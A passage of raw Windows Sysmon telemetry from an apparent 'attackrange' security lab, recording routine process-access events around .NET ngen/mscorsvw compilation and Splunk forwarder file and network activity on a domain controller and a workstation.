14:58:36.560{A7A01FEF-C0A6-607E-8105-00000000BB01}8366044C:\Windows\Explorer.EXE{A7A01FEF-C0B0-607E-9905-00000000BB01}5288C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\System32\TwinUI.dll+57c95|C:\Windows\System32\TwinUI.dll+37590|C:\Windows\System32\TwinUI.dll+37435|C:\Windows\System32\TwinUI.dll+38893|C:\Windows\System32\TwinUI.dll+36e6d|C:\Windows\System32\TwinUI.dll+36c71|C:\Windows\System32\TwinUI.dll+3fb990|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+618a9|C:\Windows\System32\combase.dll+27a9|C:\Windows\System32\RPCRT4.dll+62d9b|C:\Windows\System32\combase.dll+64ddc|C:\Windows\System32\combase.dll+64a92|C:\Windows\System32\combase.dll+633a8|C:\Windows\System32\combase.dll+6180f|C:\Windows\System32\combase.dll+6080f|C:\Windows\System32\combase.dll+5df06|C:\Windows\System32\combase.dll+5d6ba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0 10341000x800000000000000080221Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.482{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7E0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080220Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.482{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7E0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080219Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.482{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-7E0E-00000000BB01}4232C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080218Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.341{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7D0E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080217Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.325{A7A01FEF-B624-607E-0500-00000000BB01}6442236C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7D0E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080216Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.325{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-7D0E-00000000BB01}1684C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 23542300x800000000000000080215Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.294{A7A01FEF-E38C-607E-860A-00000000BB01}5624NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=F1A198DBE2D35686999E2783250D46F6,SHA256=FF259204195D3F311111ACA1A40508456F9046698AFB74B04D3DE161F8E4A689,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080214Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.279{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7C0E-00000000BB01}1388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080213Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.263{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7C0E-00000000BB01}1388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080212Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.263{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-7C0E-00000000BB01}1388C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080211Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.216{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7B0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080210Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.200{A7A01FEF-B624-607E-0500-00000000BB01}644660C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7B0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080209Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.200{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-7B0E-00000000BB01}3640C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080208Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.169{A7A01FEF-B625-607E-0C00-00000000BB01}6684872C:\Windows\system32\svchost.exe{A7A01FEF-EC1C-607E-7A0E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080207Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.154{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1C-607E-7A0E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080206Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:36.154{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1C-607E-7A0E-00000000BB01}5436C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 354300x800000000000000080205Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:34.282{A7A01FEF-E386-607E-7B0A-00000000BB01}5904C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-339.attackrange.local57577-false10.0.1.12-8000- 354300x800000000000000050560Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:33.744{85C0FFC9-B863-607E-C500-00000000BB01}1976C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-895.attackrange.local52538-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x800000000000000050559Microsoft-Windows-Sysmon/Operationalwin-host-895.attackrange.local-2021-04-20 14:58:36.122{85C0FFC9-B869-607E-D200-00000000BB01}3944NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=67B93F57BBCF87E26994F90DAC9F17AF,SHA256=B033E8B26583D4859260472D1AFA318821D1F50F5DEF40A224CE275045F18E4A,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000080370Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.997{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-940E-00000000BB01}3896C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x103801C:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080369Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.950{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-930E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080368Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.950{A7A01FEF-B624-607E-0500-00000000BB01}644760C:\Windows\system32\csrss.exe{A7A01FEF-EC1D-607E-930E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000080367Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.950{A7A01FEF-EBDF-607E-ED0C-00000000BB01}71206088C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe{A7A01FEF-EC1D-607E-930E-00000000BB01}5084C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+3965|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+aafe|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a457|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a19d|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+a055|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+77c6|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2d26|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+9828|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+74ce|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+7395|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvc.dll+2bd9|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+8c07|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2130|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+1f0f|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+29e1|C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.exe+2969|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080366Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 14:58:37.904{A7A01FEF-B625-607E-0C00-00000000BB01}6683532C:\Windows\system32\svchost.exe{A7A01FEF-EC1D-607E-920E-00000000BB01}3096C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000080365Microsoft-Windows-Sysmon/Operationalwin-dc-339.attackrange.local-2021-04-20 